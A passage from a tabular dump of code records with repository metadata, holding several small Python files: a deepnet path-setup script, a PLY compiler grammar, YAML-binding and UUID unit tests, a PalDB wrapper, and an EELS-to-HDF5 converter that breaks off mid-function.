hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
19cefb59554afa364e4773842b11bb4a32b5748b | 575 | py | Python | deepnet/datasets/setup_data_paths.py | smoitra87/deepnet | c4f89c65f78298d846bd6dc0654b9c8f5e223f2b | [
"BSD-3-Clause"
] | null | null | null | deepnet/datasets/setup_data_paths.py | smoitra87/deepnet | c4f89c65f78298d846bd6dc0654b9c8f5e223f2b | [
"BSD-3-Clause"
] | null | null | null | deepnet/datasets/setup_data_paths.py | smoitra87/deepnet | c4f89c65f78298d846bd6dc0654b9c8f5e223f2b | [
"BSD-3-Clause"
] | null | null | null | from deepnet import util
import os
def SetupDataPbtxt(data_pbtxt_file, data_path):
    data_pbtxt = util.ReadData(data_pbtxt_file)
    for data in data_pbtxt.data:
        fname = os.path.basename(data.file_pattern)
        data.file_pattern = os.path.join(data_path, fname)
    util.WritePbtxt(data_pbtxt_file, data_pbtxt)
if __name__ == '__main__':
    # 'commands' was removed in Python 3; subprocess provides getstatusoutput
    from subprocess import getstatusoutput
    for data_pbtxt_file in getstatusoutput("find . -name 'data.pbtxt'")[1].split():
        SetupDataPbtxt(data_pbtxt_file,
                       os.path.dirname(os.path.abspath(data_pbtxt_file)))
| 35.9375 | 83 | 0.735652 | 81 | 575 | 4.888889 | 0.358025 | 0.227273 | 0.19697 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002075 | 0.161739 | 575 | 15 | 84 | 38.333333 | 0.819502 | 0 | 0 | 0 | 0 | 0 | 0.057391 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.230769 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
19d4e6ce2d2944c11621e48439ce13e4b92cc071 | 6,084 | py | Python | draguilator/draguitax.py | robsonzagrejr/draguilator | 3379f79250dc78f88b14fb6a819372eed4caf970 | [
"MIT"
] | null | null | null | draguilator/draguitax.py | robsonzagrejr/draguilator | 3379f79250dc78f88b14fb6a819372eed4caf970 | [
"MIT"
] | null | null | null | draguilator/draguitax.py | robsonzagrejr/draguilator | 3379f79250dc78f88b14fb6a819372eed4caf970 | [
"MIT"
] | null | null | null | """
Implementation of a Compiler for INE5426 - UFSC
Authors:
Mateus Favarin Costa (18100539)
Robson Zagre Junior (18102721)
Wesly Carmesini Ataide (18100547)
"""
import ply.yacc as yacc
from draguilexer import tokens
def p_program(p):
    '''program : statement
               | funclist
               | empty
    '''
    pass

def p_funclist(p):
    '''funclist : funcdef _funclist
    '''
    pass

def p__funclist(p):
    '''_funclist : funclist
                 | empty
    '''
    pass

def p_funcdef(p):
    '''funcdef : DEFINE IDENT LPAREN paramlist RPAREN LBRACES statelist RBRACES
    '''
    pass

def p_paramlist(p):
    '''paramlist : INT IDENT _paramlist
                 | FLOAT IDENT _paramlist
                 | STRING IDENT _paramlist
                 | empty
    '''
    pass

def p__paramlist(p):
    '''_paramlist : COMMA paramlist
                  | empty
    '''
    pass

def p_statement(p):
    '''statement : vardecl SEMICOLON
                 | atribstat SEMICOLON
                 | printstat SEMICOLON
                 | readstat SEMICOLON
                 | returnstat SEMICOLON
                 | ifstat
                 | forstat
                 | LBRACES statelist RBRACES
                 | BREAK SEMICOLON
                 | SEMICOLON
    '''
    pass

def p_vardecl(p):
    '''vardecl : INT IDENT vardecl_line
               | FLOAT IDENT vardecl_line
               | STRING IDENT vardecl_line
    '''
    pass

def p_vardecl_line(p):
    '''vardecl_line : LBRACKET INT_CONSTANT RBRACKET vardecl_line
                    | empty
    '''
    pass

def p_atribstat(p):
    '''atribstat : lvalue ASSIGN _atribstat
    '''
    pass

def p__atribstat(p):
    '''_atribstat : PLUS _atribstat_help
                  | MINUS _atribstat_help
                  | __atribstat
                  | IDENT ___atribstat
                  | allocexpression
    '''
    pass

def p__atribstat_help(p):
    '''_atribstat_help : IDENT lvalue_line term_line numexpression_line _expression
                       | __atribstat
    '''
    pass

def p___atribstat(p):
    '''__atribstat : INT_CONSTANT term_line numexpression_line _expression
                   | FLOAT_CONSTANT term_line numexpression_line _expression
                   | STRING_CONSTANT term_line numexpression_line _expression
                   | NULL term_line numexpression_line _expression
                   | LPAREN numexpression RPAREN term_line numexpression_line _expression
    '''
    pass

def p____atribstat(p):
    '''___atribstat : lvalue_line term_line numexpression_line _expression
                    | LPAREN paramlistcall RPAREN
    '''
    pass

def p_funccall(p):
    '''funccall : IDENT LPAREN paramlistcall RPAREN
    '''
    pass
    # p[0] = "ident()"

def p_paramlistcall(p):
    '''paramlistcall : IDENT _paramlistcall
                     | empty
    '''
    pass

def p__paramlistcall(p):
    '''_paramlistcall : COMMA paramlistcall
                      | empty
    '''
    pass

def p_printstat(p):
    '''printstat : PRINT expression
    '''
    pass

def p_readstat(p):
    '''readstat : READ lvalue
    '''
    pass

def p_returnstat(p):
    '''returnstat : RETURN
    '''
    pass

def p_ifstat(p):
    '''ifstat : IF LPAREN expression RPAREN LBRACES statelist RBRACES _ifstat
    '''
    pass

def p__ifstat(p):
    '''_ifstat : ELSE statement
               | empty
    '''
    pass

def p_forstat(p):
    '''forstat : FOR LPAREN atribstat SEMICOLON expression SEMICOLON atribstat RPAREN statement
    '''
    pass

def p_statelist(p):
    '''statelist : statement _statelist
    '''
    pass

def p__statelist(p):
    '''_statelist : statelist
                  | empty
    '''
    pass

def p_allocexpression(p):
    '''allocexpression : NEW _allocexpression
    '''
    pass

def p__allocexpression(p):
    '''_allocexpression : INT allocexpression_line
                        | FLOAT allocexpression_line
                        | STRING allocexpression_line
    '''
    pass

def p_allocexpression_line(p):
    '''allocexpression_line : LBRACKET numexpression RBRACKET _allocexpression_line
    '''
    pass

def p__allocexpression_line(p):
    '''_allocexpression_line : allocexpression_line
                             | empty
    '''
    pass

def p_expression(p):
    '''expression : numexpression _expression
    '''
    pass

def p__expression(p):
    '''_expression : LESS_THAN numexpression
                   | GREATER_THAN numexpression
                   | LESS_EQUAL_THAN numexpression
                   | GREATER_EQUAL_THAN numexpression
                   | EQUAL_TO numexpression
                   | NOT_EQUAL_TO numexpression
                   | empty
    '''
    pass

def p_numexpression(p):
    '''numexpression : term numexpression_line
    '''
    pass

def p_numexpression_line(p):
    '''numexpression_line : PLUS term numexpression_line
                          | MINUS term numexpression_line
                          | empty
    '''
    pass

def p_term(p):
    '''term : unaryexpr term_line
    '''
    pass

def p_term_line(p):
    '''term_line : TIMES unaryexpr term_line
                 | DIVIDE unaryexpr term_line
                 | MODULO unaryexpr term_line
                 | empty
    '''
    pass

def p_unaryexpr(p):
    '''unaryexpr : factor
                 | PLUS factor
                 | MINUS factor
    '''
    pass

def p_factor(p):
    '''factor : INT_CONSTANT
              | FLOAT_CONSTANT
              | STRING_CONSTANT
              | NULL
              | lvalue
              | LPAREN numexpression RPAREN
    '''
    pass

def p_lvalue(p):
    '''lvalue : IDENT lvalue_line
    '''
    pass

def p_lvalue_line(p):
    '''lvalue_line : LBRACKET numexpression RBRACKET lvalue_line
                   | empty
    '''
    pass

def p_empty(p):
    '''empty :'''
    pass

# Error rule for syntax errors
def p_error(p):
    print(f"Syntax error in input: {p.value} ({p.type})")
    print("Current sentence form")
    print(f"{parser.symstack} \n\n")
    raise SyntaxError

# Build the parser
parser = yacc.yacc()
| 19.192429 | 96 | 0.571499 | 590 | 6,084 | 5.615254 | 0.184746 | 0.049502 | 0.09176 | 0.054935 | 0.347117 | 0.261395 | 0.106852 | 0.039843 | 0.039843 | 0.039843 | 0 | 0.007268 | 0.344181 | 6,084 | 316 | 97 | 19.253165 | 0.823058 | 0.506739 | 0 | 0.454545 | 0 | 0 | 0.049255 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.465909 | false | 0.454545 | 0.022727 | 0 | 0.488636 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
19dbc53d03d9bbf0bca3d6a3a06ede254031c55c | 6,103 | py | Python | unittest/yaml_util_test.py | gregturn/spinnaker | 8731e9edc1619e798a76fedb30b26cf48fa62897 | [
"Apache-2.0"
] | null | null | null | unittest/yaml_util_test.py | gregturn/spinnaker | 8731e9edc1619e798a76fedb30b26cf48fa62897 | [
"Apache-2.0"
] | null | null | null | unittest/yaml_util_test.py | gregturn/spinnaker | 8731e9edc1619e798a76fedb30b26cf48fa62897 | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import tempfile
import unittest
from spinnaker.yaml_util import YamlBindings
class YamlUtilTest(unittest.TestCase):
    def test_load_dict(self):
        expect = {'a': 'A',
                  'b': 0,
                  'c': ['A', 'B'],
                  'd': {'child': {'grandchild': 'x'}},
                  'e': None}
        bindings = YamlBindings()
        bindings.import_dict(expect)
        self.assertEqual(expect, bindings.map)

    def test_load_string(self):
        yaml = """
a: A
b: 0
c:
  - A
  - B
d:
  child:
    grandchild: x
e:
"""
        expect = {'a': 'A',
                  'b': 0,
                  'c': ['A', 'B'],
                  'd': {'child': {'grandchild': 'x'}},
                  'e': None}
        bindings = YamlBindings()
        bindings.import_string(yaml)
        self.assertEqual(expect, bindings.map)

    def test_load_path(self):
        yaml = """
a: A
b: 0
c:
  - A
  - B
d:
  child:
    grandchild: x
e:
"""
        expect = {'a': 'A',
                  'b': 0,
                  'c': ['A', 'B'],
                  'd': {'child': {'grandchild': 'x'}},
                  'e': None}
        fd, temp_path = tempfile.mkstemp()
        os.write(fd, yaml.encode('utf-8'))  # os.write() requires bytes under Python 3
        os.close(fd)
        bindings = YamlBindings()
        bindings.import_path(temp_path)
        self.assertEqual(expect, bindings.map)

    def test_load_composite_value(self):
        bindings = YamlBindings()
        bindings.import_dict({'a': 'A', 'b': 'B'})
        bindings.import_string('test: ${a}/${b}')
        print(str(bindings.map))
        self.assertEqual('A/B', bindings.get('test'))

    def test_update_field_union(self):
        bindings = YamlBindings()
        bindings.import_dict({'a': 'A'})
        bindings.import_dict({'b': 'B'})
        self.assertEqual({'a': 'A', 'b': 'B'}, bindings.map)

    def test_update_field_union_child(self):
        bindings = YamlBindings()
        bindings.import_dict({'parent1': {'a': 'A'}, 'parent2': {'x': 'X'}})
        bindings.import_dict({'parent1': {'b': 'B'}})
        self.assertEqual({'parent1': {'a': 'A', 'b': 'B'},
                          'parent2': {'x': 'X'}},
                         bindings.map)

    def test_update_field_replace_child(self):
        bindings = YamlBindings()
        bindings.import_dict({'parent': {'a': 'A', 'b': 'B', 'c': 'C'}})
        bindings.import_dict({'parent': {'a': 'X', 'b': 'Y', 'z': 'Z'}})
        self.assertEqual({'parent': {'a': 'X', 'b': 'Y', 'z': 'Z', 'c': 'C'}},
                         bindings.map)

    def test_load_not_found(self):
        bindings = YamlBindings()
        bindings.import_dict({'field': '${injected.value}'})
        self.assertEqual('${injected.value}', bindings.get('field'))

    def test_load_tail_not_found(self):
        bindings = YamlBindings()
        bindings.import_dict({'field': '${injected.value}', 'injected': {}})
        self.assertEqual('${injected.value}', bindings.get('field'))

    def test_load_default(self):
        bindings = YamlBindings()
        bindings.import_dict({'field': '${injected.value:HELLO}'})
        self.assertEqual('HELLO', bindings.get('field'))

    def test_environ(self):
        os.environ['TEST_VARIABLE'] = 'TEST_VALUE'
        bindings = YamlBindings()
        bindings.import_dict({'field': '${TEST_VARIABLE}'})
        self.assertEqual('TEST_VALUE', bindings.get('field'))

    def test_load_transitive(self):
        bindings = YamlBindings()
        bindings.import_dict({'field': '${injected.value}'})
        bindings.import_dict({'injected': {'value': 'HELLO'}})
        self.assertEqual('HELLO', bindings.get('field'))

    def test_load_transitive_indirect(self):
        bindings = YamlBindings()
        bindings.import_dict({'field': '${injected.value}', 'found': 'FOUND'})
        bindings.import_dict({'injected': {'value': '${found}'}})
        self.assertEqual('FOUND', bindings.get('field'))

    def test_load_key_not_found(self):
        bindings = YamlBindings()
        bindings.import_dict({'field': '${injected.value}', 'injected': {}})
        with self.assertRaises(KeyError):
            bindings.get('unknown')

    def test_cyclic_reference(self):
        bindings = YamlBindings()
        bindings.import_dict({'field': '${injected.value}',
                              'injected': {'value': '${field}'}})
        with self.assertRaises(ValueError):
            bindings.get('field')

    def test_replace(self):
        bindings = YamlBindings()
        bindings.import_dict({'a': 'A', 'container': {'b': 'B'}})
        self.assertEqual('This is A B or C',
                         bindings.replace('This is ${a} ${container.b} or ${c:C}'))

    def test_boolean(self):
        bindings = YamlBindings()
        bindings.import_string(
            "t: true\nf: false\ndef: ${unkown:true}\nindirect: ${f}")
        self.assertEqual(True, bindings.get('t'))
        self.assertEqual(False, bindings.get('f'))
        self.assertEqual(True, bindings.get('def'))
        self.assertEqual(False, bindings.get('indirect'))

    def test_number(self):
        bindings = YamlBindings()
        bindings.import_string(
            "scalar: 123\nneg: -321\ndef: ${unkown:234}\nindirect: ${scalar}")
        self.assertEqual(123, bindings.get('scalar'))
        self.assertEqual(-321, bindings.get('neg'))
        self.assertEqual(234, bindings.get('def'))
        self.assertEqual(123, bindings.get('indirect'))

    def test_list(self):
        bindings = YamlBindings()
        bindings.import_string(
            "root:\n - elem: 'first'\n - elem: 2\ncopy: ${root}")
        self.assertEqual([{'elem': 'first'}, {'elem': 2}],
                         bindings.get('root'))
        self.assertEqual(bindings.get('root'), bindings.get('copy'))


if __name__ == '__main__':
    loader = unittest.TestLoader()
    suite = loader.loadTestsFromTestCase(YamlUtilTest)
    unittest.TextTestRunner(verbosity=2).run(suite)
| 31.621762 | 79 | 0.612977 | 729 | 6,103 | 5.015089 | 0.226337 | 0.095733 | 0.145514 | 0.176696 | 0.55279 | 0.460339 | 0.372265 | 0.324672 | 0.253282 | 0.207604 | 0 | 0.008658 | 0.205145 | 6,103 | 192 | 80 | 31.786458 | 0.745001 | 0.093233 | 0 | 0.476821 | 0 | 0.006623 | 0.180978 | 0.013043 | 0 | 0 | 0 | 0 | 0.172185 | 0 | null | null | 0 | 0.192053 | null | null | 0.006623 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
19dc9d5ed99e8eeab8f90952e95c511b70380d0a | 1,210 | py | Python | tests/test_is_uuid.py | alvistack/daveoncode-python-string-utils | 78929d88d90b1f90cb4837528ed955166bf0f559 | [
"MIT"
] | 3 | 2020-08-20T10:27:13.000Z | 2021-11-02T20:28:16.000Z | tests/test_is_uuid.py | alvistack/daveoncode-python-string-utils | 78929d88d90b1f90cb4837528ed955166bf0f559 | [
"MIT"
] | null | null | null | tests/test_is_uuid.py | alvistack/daveoncode-python-string-utils | 78929d88d90b1f90cb4837528ed955166bf0f559 | [
"MIT"
] | null | null | null | from unittest import TestCase
from uuid import uuid4, uuid1
from string_utils import is_uuid
class IsUUIDTestCase(TestCase):
    def test_should_consider_false_non_string_objects(self):
        # noinspection PyTypeChecker
        self.assertFalse(is_uuid(None))
        # noinspection PyTypeChecker
        self.assertFalse(is_uuid(1))
        # noinspection PyTypeChecker
        self.assertFalse(is_uuid([]))
        # noinspection PyTypeChecker
        self.assertFalse(is_uuid({'a': 1}))
        # noinspection PyTypeChecker
        self.assertFalse(is_uuid(True))

    def test_should_accept_valid_uuid_objects(self):
        for i in range(1000):
            # noinspection PyTypeChecker
            self.assertTrue(is_uuid(uuid4()))
            self.assertTrue(is_uuid(uuid1()))

    def test_should_accept_valid_uuid_strings(self):
        for i in range(1000):
            self.assertTrue(is_uuid(str(uuid4())))
            self.assertTrue(is_uuid(str(uuid1())))

    def test_accepts_hex_value_of_uuid(self):
        for i in range(1000):
            # noinspection PyTypeChecker
            self.assertTrue(is_uuid(uuid4().hex, True))
            self.assertTrue(is_uuid(uuid1().hex, True))
| 30.25 | 60 | 0.661157 | 141 | 1,210 | 5.432624 | 0.29078 | 0.093995 | 0.265013 | 0.156658 | 0.712794 | 0.58094 | 0.302872 | 0.180157 | 0.180157 | 0.180157 | 0 | 0.02407 | 0.244628 | 1,210 | 39 | 61 | 31.025641 | 0.814004 | 0.155372 | 0 | 0.136364 | 0 | 0 | 0.000986 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.181818 | false | 0 | 0.136364 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
19dd4cb9e26fbf8d0f017d672356a19e0819e983 | 695 | py | Python | api/PalDB.py | zhaozhongyu/PalDB | 3249df7819009622d252470d27a4ca8aac03fe27 | [
"Apache-2.0"
] | 2 | 2017-04-11T00:20:53.000Z | 2017-04-24T08:03:07.000Z | api/PalDB.py | zhaozhongyu/PalDB | 3249df7819009622d252470d27a4ca8aac03fe27 | [
"Apache-2.0"
] | null | null | null | api/PalDB.py | zhaozhongyu/PalDB | 3249df7819009622d252470d27a4ca8aac03fe27 | [
"Apache-2.0"
] | null | null | null | #-------------------------------------------------------------------------------
# Project: Paldb
# Name: Paldb
# Purpose:
# Author: zhaozhongyu
# Created: 2/9/2017 4:23 PM
# Copyright: (c) "zhaozhongyu" "2/9/2017 4:23 PM"
# Licence: <your licence>
# -*- coding:utf-8 -*-
#-------------------------------------------------------------------------------
from Paldb.ipml import ReaderIpml, WriterIpml
class PalDB:
    def __init__(self):
        print("PalDB init.")

    def createWriter(self, file):  # 'self' added: the original omitted it, so 'file' was bound to the instance
        print("PalDB createWriter.")
        return WriterIpml.WriterIpml(file)

    def createReader(self, file):  # 'self' added for the same reason
        print("PalDB createReader.")
        return ReaderIpml.ReaderIpml(file)
| 25.740741 | 80 | 0.493525 | 63 | 695 | 5.380952 | 0.539683 | 0.088496 | 0.035398 | 0.041298 | 0.064897 | 0.064897 | 0 | 0 | 0 | 0 | 0 | 0.033159 | 0.17554 | 695 | 26 | 81 | 26.730769 | 0.558464 | 0.52518 | 0 | 0 | 0 | 0 | 0.153125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0 | 0.7 | 0.3 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
19e86df55eb77d18e63228fef4b36910e3bf4d42 | 6,799 | py | Python | pysemeels/tools/generate_hdf5_file.py | drix00/pysemeels | 64087a64f6b065027d978e0c5d1e48847c2802cf | [
"Apache-2.0"
] | null | null | null | pysemeels/tools/generate_hdf5_file.py | drix00/pysemeels | 64087a64f6b065027d978e0c5d1e48847c2802cf | [
"Apache-2.0"
] | null | null | null | pysemeels/tools/generate_hdf5_file.py | drix00/pysemeels | 64087a64f6b065027d978e0c5d1e48847c2802cf | [
"Apache-2.0"
] | null | null | null | # !/usr/bin/env python
# -*- coding: utf-8 -*-
"""
.. py:currentmodule:: pysemeels.tools.generate_hdf5_file
.. moduleauthor:: Hendrix Demers <hendrix.demers@mail.mcgill.ca>
Generate HDF5 file from Hitachi EELS data.
"""
###############################################################################
# Copyright 2017 Hendrix Demers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# Standard library modules.
import os.path
import logging
# Third party modules.
import numpy as np
# Local modules.
# Project modules.
from pysemeels.hitachi.eels_su.elv_text_file import ElvTextParameters
from pysemeels.hitachi.eels_su.elv_file import ElvFile
from pysemeels.tools.hdf5_file_labels import *
# Globals and constants variables.
class GenerateHdf5File(object):
    def __init__(self, hdf5_file):
        self.hdf5_file = hdf5_file

    def add_spectrum(self, file_path, name=None):
        if name is None:
            basename, _extension = os.path.splitext(os.path.basename(file_path))
            name = basename

        spectrum_group = self.hdf5_file.create_group(name)

        elv_text_file_path, _extension = os.path.splitext(file_path)
        elv_text_file_path += '.txt'
        with open(elv_text_file_path, 'r', encoding="UTF-16", errors='ignore') as elv_text_file:
            elv_text_parameters = ElvTextParameters()
            elv_text_parameters.read(elv_text_file)

            spectrum_group.attrs[HDF5_MODEL] = elv_text_parameters.model
            spectrum_group.attrs[HDF5_SAMPLE_HEIGHT] = elv_text_parameters.sample_height_mm
            spectrum_group.attrs[HDF5_FILE_PATH] = elv_text_parameters.file_name
            spectrum_group.attrs[HDF5_COMMENT] = elv_text_parameters.comment
            spectrum_group.attrs[HDF5_DATE] = elv_text_parameters.date
            spectrum_group.attrs[HDF5_TIME] = elv_text_parameters.time
            spectrum_group.attrs[HDF5_ACCELERATING_VOLTAGE_V] = elv_text_parameters.accelerating_voltage_V
            spectrum_group.attrs[HDF5_ENERGY_WIDTH_eV] = elv_text_parameters.energy_width_eV
            spectrum_group.attrs[HDF5_ENERGY_LOSS] = elv_text_parameters.energy_loss_eV
            spectrum_group.attrs[HDF5_ACQUISITION_SPEED] = elv_text_parameters.speed_us

        with open(file_path, 'r', encoding="ANSI", errors='ignore') as elv_text_file:
            elv_file = ElvFile()
            elv_file.read(elv_text_file)

            self.compare_attribute(spectrum_group, HDF5_DATE, elv_file.date)
            self.compare_attribute(spectrum_group, HDF5_TIME, elv_file.time)
            self.compare_attribute(spectrum_group, HDF5_COMMENT, elv_file.comment)
            self.compare_attribute(spectrum_group, HDF5_ACQUISITION_SPEED, elv_file.dose)
            self.compare_attribute(spectrum_group, HDF5_ENERGY_LOSS, elv_file.le)
            spectrum_group.attrs[HDF5_RAW] = elv_file.raw
            self.compare_attribute(spectrum_group, HDF5_ENERGY_WIDTH_eV, elv_file.energy_width)
            spectrum_group.attrs[HDF5_DUAL_DET_POSITION] = elv_file.dual_det_position
            spectrum_group.attrs[HDF5_DUAL_DET_POST] = elv_file.dual_det_post
            spectrum_group.attrs[HDF5_DUAL_DET_CENTER] = elv_file.dual_det_center
            spectrum_group.attrs[HDF5_Q1] = elv_file.q1
            spectrum_group.attrs[HDF5_Q1S] = elv_file.q1s
            spectrum_group.attrs[HDF5_Q2] = elv_file.q2
            spectrum_group.attrs[HDF5_Q2S] = elv_file.q2s
            spectrum_group.attrs[HDF5_Q3] = elv_file.q3
            spectrum_group.attrs[HDF5_H1] = elv_file.h1
            spectrum_group.attrs[HDF5_H1S] = elv_file.h1s
            spectrum_group.attrs[HDF5_H2] = elv_file.h2
            spectrum_group.attrs[HDF5_H2S] = elv_file.h2s
            spectrum_group.attrs[HDF5_H4] = elv_file.h4
            spectrum_group.attrs[HDF5_ELV_X] = elv_file.elv_x
            spectrum_group.attrs[HDF5_ELV_Y] = elv_file.elv_y
            spectrum_group.attrs[HDF5_SPECTRUM_ALIGNMENT_X] = elv_file.spectrum_alignment_x
            spectrum_group.attrs[HDF5_SPECTRUM_ALIGNMENT_Y] = elv_file.spectrum_alignment_y
            spectrum_group.attrs[HDF5_DET_SPEC_ALIGNMENT_X] = elv_file.det_spec_alignment_x
            spectrum_group.attrs[HDF5_DET_SPEC_ALIGNMENT_Y] = elv_file.det_spec_alignment_y
            spectrum_group.attrs[HDF5_DET_MAP_ALIGNMENT_X] = elv_file.det_map_alignment_x
            spectrum_group.attrs[HDF5_DET_MAP_ALIGNMENT_Y] = elv_file.det_map_alignment_y
            spectrum_group.attrs[HDF5_MAGNIFICATION] = elv_file.mag

            data = np.zeros((1023, 5))
            data[:, 0] = elv_file.energies_eV[:-1]
            data[:, 1] = elv_file.counts[:-1]
